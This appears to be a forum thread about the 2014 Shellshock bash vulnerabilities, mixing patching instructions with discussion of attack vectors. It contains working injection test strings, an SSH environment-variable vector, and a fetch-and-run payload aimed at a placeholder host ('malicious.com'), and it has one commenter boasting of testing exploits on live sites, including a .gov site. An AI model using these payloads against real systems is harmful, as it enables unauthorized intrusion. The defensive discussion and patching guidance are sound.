Another huge family of vulnerabilities that exists for the same reason are SQL injection vulnerabilities. SQL was invented as a way for humans at a terminal to do database operations. However, we started using it as a way of doing IPC. The problem with using human interfaces as an IPC mechanism is that human interfaces are rarely well-defined or minimal, so it is very hard to constrain behavior to what you expect.

The way to fix all of these bugs is to use well-defined, computer-oriented IPC mechanisms where there is a clear distinction between code and data. For example, database queries might be constructed by function call instead of string manipulation, which could pack them into a safe TLV format with no chance of malicious query injection. Generating web server content from a different language could be done via a proper FFI or message passing mechanism, rather than CGI scripts.

Here's how to patch Ubuntu 8.04 or anything where you have to build bash from source:

  #assume that your sources are in /src
  cd /src
  wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
  #download all patches
  for i in $(seq -f "%03g" 1 25); do wget http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done
  tar zxvf bash-4.3.tar.gz 
  cd bash-4.3
  #apply all patches
  for i in $(seq -f "%03g" 1 25); do patch -p0 < ../bash43-$i; done
  #build and install
  ./configure && make && make install

Not sure if Ubuntu 8.04 with custom built bash will be upgradable to 10.04??

Or you could just download a bash-static deb from 10.04 (https://launchpad.net/ubuntu/lucid/+package/bash-static) and overwrite /bin/bash. It shouldn't cause any issues when upgrading, though you could back up the original.

8.04 is unsupported, and situations like this justify the effort of upgrading it to the latest LTS.

Enter this PoC in your terminal:

  env var='() {(a)=>\' bash -c "echo date"; cat echo

A target patched only for CVE-2014-6271 will still output the date upon executing that PoC (Proof of Concept):

  bash: var: line 1: syntax error near unexpected token `='
  bash: var: line 1: `'
  bash: error importing function definition for `var'
  Thu Sep 25 17:52:32 EDT 2014

There is a new update (#26) for bash 4.3 which fixes CVE-2014-7169 (the old bash update was still flawed/incomplete as demonstrated above by executing the PoC). So, taking into account what everyone before contributed, the new complete patch code would be:

  mkdir src
  cd src
  wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
  #download all patches
  for i in $(seq -f "%03g" 1 26); do wget http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done
  tar zxvf bash-4.3.tar.gz
  cd bash-4.3
  #apply all patches
  for i in $(seq -f "%03g" 1 26); do patch -p0 < ../bash43-$i; done
  #build and install
  sudo ./configure --prefix=/usr --bindir=/bin --sbindir=/sbin --sysconfdir=/etc && sudo make && sudo make install

Once patched for CVE-2014-7169, the previous PoC should no longer return the date:

  bash: var: line 1: syntax error near unexpected token `='
  bash: var: line 1: `'
  bash: error importing function definition for `var'
  cat: echo: No such file or directory

And thanks to all previous contributors!

This sequence failed for me because my Ubuntu 8.04 didn't have patch installed.

I found a source copy at https://launchpad.net/ubuntu/+source/patch/2.5.9-4 and built/installed that first. The resulting fix appears to work (after copying resulting bash to /bin as noted elsewhere).

I had the same problem. I needed to install patch, make and gcc. So I downloaded the iso from http://old-releases.ubuntu.com/releases/hardy/ and then edited /etc/apt/sources.list so my server would look on the cd for the packages. I could then use 'apt-get install' to install the required programs. I also found that the 'do' command was throwing up an error. Rather than work out why I just manually downloaded the 26 patches and then manually applied them as well. Yeah ok I'm a noob but it worked.

I am running Ubuntu 10.10 but patch is not installed. Can someone explain the commands needed to download, build, and install patch as mentioned above. Thanks for any help.

I found out how to install the patch package here:


This won't work; you need

sudo make install

Given the circumstances, a lot of people without much software experience will be reading this message and simply copying and pasting; it's worth getting it right.

On Ubuntu, you'll probably want to ./configure --prefix=/usr/bin . If you install in /usr/local/bin (the default), bash will effectively no longer be updated by apt-get.

That should probably have been ./configure --prefix=/usr --bindir=/bin --sbindir=/sbin --sysconfdir=/etc

Once upon a time, distributions documented their build configurations. Or maybe it's that I used to only use FreeBSD.

That script assumes that it is executed as root. There's indeed a possible problem with /usr/local/bin/bash vs. /bin/bash with Ubuntu update from 8.04 to 10.04 (since Ubuntu 8.04 itself is no longer updateable), thus I asked that question in the end of my post. To mitigate it, one can just add:

  mv /usr/local/bin/bash /bin
as the last line.

I tried this and realized it installs the binary under /usr/local/bin. You'll need to make a symlink, or preferably follow ricilake's advice; if you forget to do this and log out, you may never log back in. Btw, the path to bash in Ubuntu is /bin/bash, not /usr/bin/bash.

I just wanted to say, "Thanks!"

I successfully patched my 8.04 server and passed the test.

I used sudo ./configure --prefix=/usr --bindir=/bin --sbindir=/sbin --sysconfdir=/etc && sudo make && sudo make install after retrieving and patching the bash build files.

Why is my bash version still 4.2.45(1) after this?

    # bash --version
    bash --version
    GNU bash, version 4.2.45(1)-release (x86_64-pc-linux-gnu)
Though it seems the vulnerability got fixed.

Hi, I have tried to follow the instruction given by rtmdivine to patch for CVE-2014-6271 but at the end of the process I still get the date. Any suggestions? Thanks

In Debian Lenny you should also do at the end sudo rm /bin/bash && sudo ln -s /usr/local/bin/bash /bin/bash

need to wget all the patches including #26 to fix the 2nd bug reported. instead why not just wget the whole dir of patches..

wget -r 1 -nH -nd -np http://ftp.gnu.org/gnu/bash/bash-4.3-patches/ && rm \\.sig index.html cd bash-4.3; for i in ../bash43-*; do patch -p0 < $i; done


wtf. this damn form ate my 's and stuff.

try again:

wget -r 1 -nH -nd -np http://ftp.gnu.org/gnu/bash/bash-4.3-patches/ && rm \.sig index.html\*

should be no \'s (or \\s) before the *'s above.

I give up this thing is eating asterisks, cant type em

Does this fix CVE-2014-7169 as well, or just CVE-2014-6271?

It is a very good thing that Debian and Ubuntu use /bin/dash for /bin/sh by default, since /bin/sh is implicitly invoked all over the place (e.g. by system(3)). Distros which use /bin/bash for /bin/sh are gonna have a bad time.

Edit: not implying that Debian and Ubuntu aren't affected too, just that the impact there will be lessened.

I am sure tons of people reading already know this, but I have a habit of saying this everywhere I see system() mentioned on the internet, just in case somebody reading is tempted to use it: system() is evil; please, for the love of god, never use it.

If you need to invoke another program use execve() and friends. The versions that end in -p will even check PATH for you. You don't need a shell to evaluate your arguments. Cut out the middle man and pass the arguments directly. It will save you a lot of stupid bugs.
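To make the difference concrete, a sketch (with a hypothetical user-supplied value) of why the string form is dangerous and the direct-argument form isn't:

```shell
# Hypothetical user-supplied value:
userinput='nosuchfile; echo INJECTED'

# String form: the data is re-parsed as shell code, so the ; splits commands.
sh -c "ls $userinput"      # runs ls, THEN runs echo INJECTED

# Direct form: the value travels as a single argv element, never re-parsed.
ls -- "$userinput"         # just an error about one strangely named file
```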

There's nothing wrong with using system anywhere you would happily cover your eyes and paste the string content into a shell. That shouldn't be many places, if anywhere, in production software. It's fine for simple things that would've been shell scripts anyway but for the need to XYZ.

The API for system() is not great, but the execve family of functions are not drop-in replacements since they don't take care of forking, changing the signals, and waiting. As long as you're not passing arguments from outside sources to the command, using system() should be OK.

> the execve family of functions are not drop-in replacements since they don't take care of forking, changing the signals, and waiting.

Maybe not in C, but they are a drop-in replacement in just about every scripting language. Perl, Ruby, and Python all have nice high-level calls that mostly mimic system() but use execve underneath; you simply pass system() multiple arguments instead of a single string. `system("")` in your production web app server code is almost certainly incorrect.

Sadly I think PHP still doesn't have this.

> As long as you're not passing arguments from outside sources to the command, using system() should be OK.

Very true, but think about whether you really need a shell to launch your command (are you using any shell features?). If not, why not just launch the command directly?

And in some cases invoking the shell and letting it do its thing is expected, intended and desirable.

Would you execute random Perl or Python code from the internet? No, you wouldn't, even if you tried to sanitize it a thousand ways from Sunday. So why would you do so for the shell?

Defense must use different strategies than offense. An engineer's goal should be to reduce the problem space to something as small as possible, so he has a better chance at implementing a correct solution. Allowing the shell to be invoked is a good way to explode your exploitable surface area.

Anybody who coded in the 1990s knows to stay away from the shell like the plague, even though the syntax parsing and evaluation components in modern shells have improved considerably. Sadly this particular bug harks back to the bad days, when it was more difficult to tell how certain constructs would be evaluated.

It's not that you can't theoretically do it securely, it's just that you're gratuitously playing with fire--fire that has burned countless engineers in the past. The cost+benefit is so indisputably skewed toward little cost and huge risk that it's unprofessional to suggest otherwise.

The shell shouldn't come anywhere near network-facing software, period.

> are not drop-in replacements since they don't take care of forking, changing the signals, and waiting.

I never claimed it as a drop-in replacement. I think you know the solution to these problems. (I guess maybe someone who naively uses system() might not, so perhaps I need to work on a better spiel.)

> As long as you're not passing arguments from outside sources to the command, using system() should be OK.

Personally I've seen too many bad uses of system() to make that a thing. Maybe they'll not realize it's subject to PATH and that PATH can be untrusted. Maybe they'll not realize they sometimes have asterisks and spaces in a filename. And so forth...

Do you have a source for that? Some articles [0] claim "This affects Debian as well as other Linux distributions."

[0] http://www.csoonline.com/article/2687265/application-securit...

Debian7 doesn't look to be vulnerable by default (if the code snippet can be trusted to work):

    [arch/testbed ~] uname -a
    Linux 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux
    [arch/testbed ~]  env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test

I have a Debian Squeeze system. Just ran apt-get upgrade and bash wasn't upgraded at all. Just other things like CUPS, exim4, pgsql, ...

Squeeze doesn't have regular security support anymore. A subset of packages on i386 and amd64 are receiving long term security support, but you need to enable the Squeeze LTS repo:


It has not reached the lts mirrors yet, but you can get it from http://incoming.debian.org/debian-buildd/pool/main/b/bash/

As of 7:24 PM GMT the above link has the amd64 .deb for sid.

Still waiting on the i386 .deb for sid.

Your link and this link (https://security-tracker.debian.org/tracker/CVE-2014-6271) useful when considered together.

The i386 .deb is available!

Aaaand now I'm done checking back on this thread. Have fun, folks! :)

Thanks. dpkg --install'ed the amd64 .deb package, and the vulnerability test passes now.

Make sure security.debian.org is in your apt sources list?

Thanks for the hint folks. My eyes glazed over when OSS people started using packages some 20 odd years ago.

My brain refuses to understand anything more than the beautiful simplicity of a tarball extracted from the / directory. :)


Yes, the printing of “vulnerable” in the 4th line of your code snippet.

You appear to already have the updated package installed.

Last dist-upgrade was about a week ago, all indications point towards the bash released back in Jan 2013. It's fixed in 4.2+dfsg-0.1+deb7u1 and I'm running 4.2+dfsg-0.1

Well, that's very odd because that command reports vulnerable on an unpatched Debian system, but fails with exactly that error message on a patched system.

You're right and my comment was unclear. I'm just saying that the impact on Debian will be less than on distros using /bin/bash for /bin/sh. Of course, even a lessened impact can still be really bad!

Likely meaning that the Debian packages for Bash include the vulnerability

Isn't /bin/sh vulnerable to the same thing? At least it seems for me:

    sh-3.2$ env x='() { :;}; echo vulnerable' /bin/sh -c "echo this is a test"
    this is a test

/bin/sh depends on the system. It might be busybox or a minimal shell (this is common on embedded devices). On some systems like OSX and I think CentOS /bin/sh is just bash. You can check with `/bin/sh --version`.
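Or, without executing it (GNU userland assumed):

```shell
# Inspect rather than run: /bin/sh is typically a symlink on Linux.
ls -l /bin/sh          # shows the immediate symlink target (dash, bash, ...)
readlink -f /bin/sh    # resolves the full link chain to the actual binary
```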

Ah, thanks. Yes, tested it exactly on OSX and CentOS.

Major impact of this is elevating privileges, both Debian and Ubuntu will be impacted just like any other system.

I don't think anybody is worried about software on the system that is using /bin/bash .vs /bin/sh.

Where is the privilege escalation? I get the same results from running id through tripping the bug as I do from running id directly.

Edited to add: Also no differences in capabilities when I cat /proc/self/status

None of which is to say there is clearly no such vulnerability - I'd just like to understand it if there is.

Basically, anywhere this vulnerability exists, there is the option to run arbitrary code. That is for example:

   curl malicious.com/local_privilege_escalation_binary -o /tmp/iwin; chmod +x /tmp/iwin; /tmp/iwin
could be the payload. This will download then run a secondary attack binary. Then the attacker wins.

That's true of any code execution vulnerability, though - it seems odd to call out the privilege elevation specifically. If that's all the GP meant, then sure, I fully grok.

I think it comes down to a jargon vs technical language thing. In formal settings arbitrary code execution is a different thing from privilege escalation. In casual jargony talk though, security guys tend to equate code execution with privilege escalation with box ownage.

Basically it goes "why would anyone not follow the execution -> escalation -> own path?" It's such an automatic assumption, combined with the basic premise of "there's no such thing as a secure computer", that the exact details are a hand-wave. This comes from the repeated demonstration that it's almost always true.

None of this seems crazy unlikely, but I'd still like to hear a confirmation that that's what was meant. Especially since korzun was talking specifically about Debian and Ubuntu where bash is only used as a login shell and so presumably those with access could already just run the app.

There are unfortunately lots of bad scripts in the world that start with #!/bin/bash.

So for example, with a foo.sh script of:

   #!/bin/bash
   echo "loser!"
Then for example:

   vagrant@ubuntu-14:~/bin$ X='() { :; }; echo foo' python
   Python 2.7.6 (default, Mar 22 2014, 22:59:56) 
   [GCC 4.8.2] on linux2
   Type "help", "copyright", "credits" or "license" for more information.
   >>> import os
   >>> os.system("./foo.sh")
   >>> import subprocess
   >>> subprocess.Popen("./foo.sh")
   <subprocess.Popen object at 0x7f04a115f350>
   >>> foo
It should be noted that if the shebang is #!/bin/sh this doesn't work when sh == dash, but given that this wiki page exists on ubuntu:


That recommends changing broken scripts to #!/bin/bash or changing to sh == bash as solutions. I would guess that there are going to be plenty of easily vulnerable debian/ubuntu systems.

More importantly though, it literally does not matter if this bug is "directly privilege escalating" or "1 step removed privilege escalating"; they are fundamentally the same thing. It doesn't matter in any case where a script is executed with bash instead of dash.

'More importantly though, it literally does not matter if this bug is "directly privilege escalating" or "1 step removed privilege escalating"; they are fundamentally the same thing. It doesn't matter in any case where a script is executed with bash instead of dash.'

It doesn't matter for security. It matters a lot for my understanding of what's going on.

Most code execution vulnerabilities aren't remotely accessible; this one is, which makes privilege escalation particularly nasty. (eg: incorrectly assuming that since the www-data user doesn't have access to anything sensitive, this bug isn't a big deal)

Is it remotely accessible on systems where sh is dash, though? That's specifically what was under discussion.

Yes, potentially - if at any point during the execution of a program (or its descendents) a bash script gets called with an untrusted environment variable value from a remote source. The difference between a system with bash as /bin/sh and a system with dash as /bin/sh is that the bash system is implicitly executing bash all the time, whereas the dash system requires an explicitly-bash script to be executed. So the dash system has many fewer windows of opportunity for an exploit, but they could still be there.

Well, sure. It seems a slightly odd way to phrase it if that's the entirety of what korzun meant, though. Is there somewhere that happens in a typical out-of-the-box Debian or Ubuntu box?

Privilege escalation is not static.

I know systems where bash has been patched to allow execution by certain users, etc.

With this, you can inject commands before such check takes place.


Hm, so only if bash is chmod or granted capabilities, absent exploiting some other vulnerability? I'd read you as saying more - no worries.

Passing executable code in environment variables is an incredibly bad idea.

The parsing bug is a red herring; there are probably ways to exploit the feature even when it doesn't have the bug.

The parsing bug means that the mere act of defining the function in the child bash will execute the attacker's code stored in the environment variable.

But if this problem is closed, the issue remains that the attacker controls the environment variable; the malicious code can be put inside the function body. Even though it will not then be executed at definition time, perhaps some child or grand-child bash can be nevertheless goaded into calling the malicious function.

Basically this is a misfeature that must be rooted out, pardon the pun.
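For context, here's the feature working "as designed", which is exactly the channel the exploit rides (run under bash; names illustrative):

```shell
# bash serializes exported functions into the environment; any child bash
# deserializes and redefines them on startup. The child below never
# defined greet itself, yet it can call it.
greet() { echo "hello from an inherited function"; }
export -f greet
bash -c greet
```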

Funny, this works even after bash fix / upgrade

env X='() { (a)=>\' sh -c "echo date"; cat echo

From http://seclists.org/oss-sec/2014/q3/672

I replaced "sh" with "bash" in the above, and on my patched system it creates a file called "echo" with the date in it. Can anyone explain how this works? Is it an exploit?

Edit: From my experiments, the name in (a) doesn't matter, and "echo" and "date" can be changed. The thing in echo's position is where the output goes (and can be an absolute path!), and "date" is a command that is run. Still no idea how it works, as I'm not very familiar with shell syntax and Googling symbols like "=>" is mostly useless. It may even be meaningless and is just garbage to get bash into a state that causes this to happen?

Edit 2: http://seclists.org/oss-sec/2014/q3/679 has a small example. "Tavis and I spent a fair amount of time trying to figure out if this poses a more immediate risk, but so far, no dice. It strongly suggests that the parser is fragile and that there may be unexpected side effects, though"

I can't comprehend how this got buried so fast in the midst of "patch, patch, patch".

So I took a great unix/linux systems programming class, http://sites.fas.harvard.edu/~lib215/ where you learn about all of the system software that you take for granted. Among other things, we had to write our own shell. There is an awful lot to consider, and most of it you are just trying to get to work properly. With regard to security, you feel like you are protected for the most part because the shell resides in userland and it's basically understood that you shouldn't trust foreign shell scripts.

Is the worry here that the code gets executed by the kernel or superuser, enabling privilege escalation? Otherwise it wouldn't be a big deal that extra code is executed by a function declaration.

It allows arbitrary code execution if an attacker can modify environment variables through other software.

Most webservers put certain HTTP headers in environment variables. I can certainly see how this could be exploited.

> Most webservers put certain HTTP headers in environment variables.

I legitimately don't understand why they might do such a thing. Can you explain?

They need to pass data into a CGI script somehow.

But a shell will rarely be involved in executing a CGI, unless that CGI itself executes one. And who still uses CGI scripts?

Not to say nobody will be bitten by that, but I don't think that's going to be all that widespread.

Have you ever looked at the backend web interface of some of the most popular residential wifi routers? It's shell script. Why? It's a cheap and accessible interpreted language; no need to clutter up your tiny embedded OS with the huge requirements of php, perl, etc when you have all the tools you need in busybox.

CGI apps execute shell scripts all the time. Even if an app executes an app executes an app executes an app, if that app four layers down runs a shell script, the environment is still passed down. Turtles, dude.
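That inheritance is easy to demonstrate; a variable set once survives however many exec layers sit in between (a two-layer sketch, names illustrative):

```shell
# Set once at the top; still visible after two further shell exec layers.
export PASSED_DOWN='set at the top'
sh -c 'exec sh -c "echo layer2 sees: \$PASSED_DOWN"'
```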

Fortunately they are unlikely to install bash at all on a router.

Routers definitely have shells, it's just a matter of whether it's bash or something else that might also be vulnerable.

Bash is big and bloated, and you already have the busybox sh probably. However apparently some do have bash....

Many people don't realize they use CGI scripts, but a lot of people are going to discover they do today.

It could be a simple one-line script that wraps the real command, setting memory limits and the like first. (I used a similar trick to prevent Skype using up all my memory in the past.)

Agreed; also the browser User-Agent and Referer headers are passed by the client to Apache, which pushes them into environment variables.


Another attack surface is OpenSSH, through the use of AcceptEnv variables, as well as TERM and SSH_ORIGINAL_COMMAND. An environment variable with an arbitrary name can carry a nefarious function, which can enable network exploitation.

On most systems I've found this works: LC_TIME='() { :;}; echo vulnerable' ssh <hostname>

Not sure of the impact of this, as the user would need to have a remote permissions anyway for the SSH login to occur. But if there was some form of restricted shell that then spawned bash it might potentially create an attack vector.
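For reference, many distros ship sshd_config with something like the following (illustrative excerpt), which is exactly why a client-offered LC_* value lands in the server-side session environment:

```
AcceptEnv LANG LC_*
```

Removing or tightening that line closes this particular channel, at the cost of locale forwarding.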

I was wondering about this too. My thinking was, if a user's laptop is compromised (and has the exploit in LC_TIME, TERM or similar), and the user then SSH in to a server with exploitable bash, the nefarious command will presumably be executed without the user knowing. But of course, if the laptop is compromised that badly, it could probably wreak havoc to the server anyway.

As an example of who might be impacted, since openssh preserves the original command line passed to the ssh server when authenticating a public key that has a fixed command associated in authorized_keys, GitHub and BitBucket security teams are probably both having a really exciting day.

This vulnerability is the kind of reason I would have a stripped-down OpenSSH for public users, if I were them. Hard-code to do what they need, don't use configuration files, remove any features not needed. For example, to print the "You've successfully authenticated, but GitHub does not provide shell access." a user gets trying to ssh to github.com, don't invoke anything, print it directly from the SSH server.

Much easier to implement a custom captive shell (the default login shell for the user) than to mess with the crypto system.

Maybe. Actually, it looks like Github is using libssh, which is along the lines of what I was thinking, without having to mess with crypto too much, as you say.

This is what Atlassian Stash does.

Amazon's Linux distro for EC2 is still waiting for a patch.

EDIT: Finally got things updated. Bulletin can be found here: https://alas.aws.amazon.com/ALAS-2014-418.html

If yum isn't finding the update, try running "yum clean all" and then "yum update bash"

Still waiting for a fix on Beanstalk. Neither "yum clean all" followed by "yum update bash" nor "yum --releasever=2014.09 update bash" currently work.

EDIT: relevant AWS threads



Should be fixed now:

To manually update EC2 instances managed by Elastic Beanstalk, you can run the following command:

For Amazon Linux 2013.09 "sudo yum install -y http://packages.us-east-1.amazonaws.com/2013.09/updates/556c...

For Amazon Linux 2014.03 "sudo yum install -y http://packages.us-east-1.amazonaws.com/2014.03/updates/e10f...

If yum still doesn't find it, you may be on an older release. Try "yum --releasever=2014.09 update bash"

I'm considering pulling an rpm from elsewhere until they have this in place.

It's updated now

A quick fix would be to stop using bash.

I write hundreds of shell scripts per year and I never, ever use bash. Everything can be done with a less complex /bin/sh having only POSIX-like features.

There's no reason webservers have to use bash by default.

Sysadmins might need a hefty shell will lots of features in order to do their work, but an httpd should not need access to bash-isms. It should work fine with a very minimal POSIX-like shell.

I'm glad the systems I use do not have bash installed by default. The only time I ever use it is when a software author tries to force me to use bash by writing their install scripts in it and using bash-isms so the script will not run with a simpler shell like a BSD /bin/sh.

Maybe I'm doing something wrong, but I just tested it in ZSH (5.0.5, Linux) and the same vulnerable behavior seems to show up.

How are you testing it? If you're just pasting one of the proof-of-concept lines into zsh, such as this one:

    env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
...then you're really just executing bash. Replace "bash" in the line above with "zsh" and the "vulnerable" line is not printed.

No, it's not printed in your trivial example, but if you replace the simple "echo" command with any bash script, or any executable that calls a bash script, or any executable that invokes another program that calls a bash script, or ... then you're screwed.

Even with the "zsh", this should print "vulnerable":

  env x='() { :;}; echo vulnerable' zsh -c "bash -c true"
You don't have to use bash explicitly. It might be called by some application or library. For example, if your default shell is a bash, this will work too:

  env x='() { :;}; echo vulnerable' zsh -c "python -c 'import os; os.system(\"true\")'"

Right, the point being that bash is vulnerable, not zsh (as was suggested by the post I was replying to). I'm not claiming that using zsh as your interactive shell somehow makes you immune.

I see this in zsh 5.0.0 on Ubuntu, and on OSX as well! zsh 5.0.2 (x86_64-apple-darwin13.0)

I'm not seeing this on zsh 4.3.17. Exactly what did you run to see this?

They probably ran

  env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
but failed to spot that the second command invokes bash not zsh.

My tests suggest that neither zsh 4.3.17 nor 5.0.6 (the versions that ship with Debian stable and testing respectively) is vulnerable to this exploit: if you replace bash with zsh in the test one-liner, the code after the end of the function definition in the environment variable is not executed.

That's it, I am an idiot today. (and more days probably)

According to http://wiki.bash-hackers.org/syntax/basicgrammar it appears that this is because bash allows functions to be exported through environment variables into subprocesses, but the code to parse those function definitions seems to be the same used to parse regular commands (and thus execute them).

Edit: after a brief glance over the affected code, this might not be so easy to patch completely - the actual method where everything interesting starts to take place is initialize_shell_variables in variables.c and parse_and_execute() in builtins/evalstring.c, so parsing and execution happen together; this is necessary to implement the shell grammar and is part of what makes it so powerful, but it can also be a source of vulnerabilities if it's not used carefully. I suppose one attempt at fixing this could be to separate out the function parsing code into its own function, one which can't ever cause execution of its input, and use that to parse function definitions in environment variables. This would be a pretty easy and elegant thing to do with a recursive-descent parser, but bash uses a lex/yacc-generated one to consume an entire command at once...

However, all in all I'm not so sure this ability to export funcdefs is such a good idea: forking a subshell automatically inherits the functions in the parent, and a shell that wasn't created in such a manner can, if it needs function definitions, read them itself from some other source. This "feature" also means environment variables cannot start with the string '() {' (and exactly the string '() {'; even removing the space between those characters, e.g. '(){', doesn't trigger it) without causing an error in any subprocess, violating the usual assumption that environment variables can hold any arbitrary string. It might be a rare case, but it's certainly a cause for surprise.
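The exact-prefix detail above is easy to mirror in a few lines; this is a sketch of the check (modeled on, not copied from, bash's import test in variables.c):

```python
def looks_like_exported_function(value):
    """Pre-patch bash treated any environment value beginning with the
    literal four characters '() {' as a function definition to parse;
    the bug was that parsing didn't stop at the closing brace."""
    return value.startswith("() {")

# The canonical payload triggers the check; dropping the space does not.
print(looks_like_exported_function("() { :;}; echo vulnerable"))  # True
print(looks_like_exported_function("(){ :;}; echo vulnerable"))   # False
```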

I'm hoping we'll see a patch soon that altogether removes this misfeature.

EDIT: Apparently that's out of the question, but there's talk about using a BASH_FUNCDEFS variable to specify which variables are function definitions instead: http://www.openwall.com/lists/oss-security/2014/09/24/20

CGI has always been an accident waiting to happen, but hardly anybody uses it anymore anyway, and even more rarely in a manner that invokes bash, of all things.

I fail to see how "HTTP requests" generically are a vector, and its "Here is a sample" statement is not a link and is followed by... nothing.

This article tells me nothing useful other than "don't allow untrusted data into your environment", which we've all known for 20 years.

> This article tells me nothing useful other than "don't allow untrusted data into your environment", which we've all known for 20 years.

Yes, we've all known that. But we're slowly discovering all different ways the untrusted data can get there.

FastCGI accepts name/value pairs from the server and most default language bindings against it will turn them into environment variables for the benefit of code that expects to be able to reference them. This can get tricky if you do anything that spawns a process with your code later.
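For the curious, those name/value pairs travel in a binary framing defined by the FastCGI spec: each length is one byte when under 128, otherwise four bytes with the high bit set on the first. A sketch of the encoder (the header value is of course invented):

```python
def encode_fcgi_pair(name: bytes, value: bytes) -> bytes:
    """Encode one FastCGI PARAMS name/value pair per the spec:
    nameLength, valueLength, then the raw bytes of each."""
    def enc_len(n: int) -> bytes:
        if n < 0x80:
            return bytes([n])
        # Long form: 4 bytes, big-endian, top bit set on the first.
        return bytes([0x80 | (n >> 24), (n >> 16) & 0xFF, (n >> 8) & 0xFF, n & 0xFF])
    return enc_len(len(name)) + enc_len(len(value)) + name + value

pair = encode_fcgi_pair(b"HTTP_USER_AGENT", b"() { :;}; echo vulnerable")
print(pair)
```

Nothing here touches the environment by itself; it only becomes dangerous when the application side deserializes these pairs into environ and later spawns bash.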

Almost all vendor-supplied web interfaces that don't come bundled with a web server are CGI so you can just run it from whatever web server you have. Even some very popular 'appliances' out there that have their own web server run CGI.

People still shell out to do stuff from scripts from all sorts of languages. Unless these sanitize the environment they would be vulnerable.
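One way a script that must shell out can protect itself is to pass an explicit, minimal environment instead of inheriting everything. A hedged sketch in Python (the whitelist is illustrative):

```python
import os
import subprocess
import sys

SAFE_VARS = {"PATH", "HOME", "LANG"}  # illustrative whitelist; adjust to taste

def clean_env():
    """Keep only whitelisted variables, and drop anything whose value
    begins with bash's exported-function marker."""
    return {
        k: v for k, v in os.environ.items()
        if k in SAFE_VARS and not v.startswith("() {")
    }

# Spawn the child with the scrubbed environment rather than the full one.
result = subprocess.run(
    [sys.executable, "-c", "import os; print(sorted(os.environ))"],
    env=clean_env(), capture_output=True, text=True, check=True,
)
print(result.stdout.strip())
```

This doesn't fix bash, but it narrows what a request can smuggle into any shell the child eventually runs.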

Unless you're using CGI, your system environment will not be contaminated. CGI is vulnerable because it relies on passing untrusted data in environment variables. No other gateway interface I'm familiar with does.

Are you certain that no method of invoking a dynamic script sets environment variables to values controlled by requests? If so, it sounds like even an innocent call to system("lame a.wav b.mp3") could lead to code execution.

Edit: also, you may be surprised to find that some "libraries" are actually wrappers around external binaries (e.g. libgpgme). If any of them used a system() or exec() call that preserves environment, and the binary or the library ever invokes bash (e.g. via system()), then trouble will ensue.

Are you certain God doesn't exist?

This is far from the first environment variable attack to impact CGI scripts, and CGI's successors have avoided passing data in environment variables.

It's possible some moron decided to create their own CGI replacement using environment variables, but it's not going to be in widespread use.

How does nginx pass data to passenger?

Edit: also note that CUPS is vulnerable according to https://access.redhat.com/articles/1200223

Also dhclient (!)

If you're using the nginx module, it gets the data from an instance of ngx_http_request_t. From there it gets passed around over sockets. Environment variables are not involved.

Using environment variables for request data would be quite insane when one of your marketing strategies is "fast" -- you'd either have to fork-per-connection just like CGI, or pre-fork processes that take input over a socket, deliberately deserialize it into the environment(!), and use getenv.

However overhyped Passenger might be, I don't know why you'd think the Phusion guys are that crazy.

Discovering that CUPS and dhclient may be vulnerable doesn't change anything. I'm talking about HTTP as an attack vector.

> hardly anybody uses it anymore anyway

Lots of PHP setups do.

Lots? Really?

PHP was one of the first to have a dedicated apache module. Perl is much more likely to be CGI.

I seem to recall cPanel defaulting to suPHP (which uses CGI).

Yeah this is true - a lot of hosting providers run PHP as a CGI as it allows them to run the PHP process under the user account (although it is very slow, and RUID2 is a better solution).

If you're not running mod_cgi can this affect the system in any way?


Yes, lots. nginx + php is very popular.

Is FastCGI the same thing as CGI, for this case, though?

They would be too slow to be useful at any kind of real load. Are you sure you're not thinking of FastCGI? That doesn't pass data through the environment, it goes over a socket.

Yeah - it is really slow, but a surprisingly large number of hosting providers run it that way under cPanel.

Is someone from Heroku online here right now? My apps are all affected and since I am trusting Heroku with this, I am hoping they patch the system as soon as possible.

They will be patching shortly [1]

[1] - https://twitter.com/jacobian/status/514865870649061376

Yep, they did. :)

Have big security vulnerabilities been cropping up more often recently or does it seem that way because I've started to pay attention?

It's been a bad time for FOSS/Linux systems: Heartbleed, the occasional priv escalation, apt-get, bash, etc. Or whatever the hell happened at TrueCrypt. Or the recent AOSP browser bug in Android that probably won't be patched by any OEM/carrier. These are all pretty serious issues. Not to mention the endless wave of malware targeting Windows systems, especially the evil CryptoLocker ransomware.

I really do think Heartbleed was a wake-up call for some people, and a lot of extra auditing is being done, perhaps with some healthy paranoia fueled by the recent NSA allegations. Software in general, IMO, is pretty insecure. The exploits, bugs, etc. are out there, and you'll find them if you look hard enough. And since software is always being updated, that also means new bugs and security issues.

As a sysadmin, I've just seen too often how the sausage is made. I have zero illusions about security. There are just too many avenues to compromise, be it via software or via plain-jane social engineering. I think one day in the future we (or our children) are going to look back at the age of viruses and buffer overflows and wonder how the hell we managed to get by, the same way I look at cars from the 50s-60s that suffered from things like vapor lock, were incredibly unsafe, and other issues that really don't exist today.

Are you referring to this apt-get vulnerability or another one: https://lists.debian.org/debian-security-announce/2014/msg00... ?


It's not like each year is an increase... but it seems this year has had more major giant remote ones than in the past.

You're just paying attention. There have been some interesting ones the last year or two, but this is really a trickle compared to the early through mid 2000s.

I still remember Redhat 6.2. Most remote exploits in a distribution ever.

People started to pay attention. There's a bunch of new vulns being patched daily; if you follow CVEs or the oss-sec list you can see that.

What's "new" (it's been done for a few years now) is that there's more marketing drive behind them: fancy commercial names, dedicated websites, and issues that are often exaggerated.

Actually, super-critical vulns are still rare (like Heartbleed, Code Red, etc.).

I tested some of the sites and successfully executed some test code. One can easily google for such sites. The important thing is that the link I used to run the code was on a .gov site.

This thing seriously needs to be patched asap. Update your systems now.

Even a harmless code exploit, when run on a computer system you do not have normal permission to use, is a felony in the USA.

Some more information was just posted to oss-sec:


With this bug, bash access to Cisco CallManager is possible... Tested and working...

VoIP software is hilariously insecure in general. This little bug is going to make some people a ton of money. Or even just cost some people a lot.

Same for Cisco NX-OS...

Off topic:

This is why I keep coming back to HN. I've gotten an amazing amount of useful info on this very quickly. Great discussion - no trolling, no BS, just serious questions and serious answers.

Don't tell anyone.

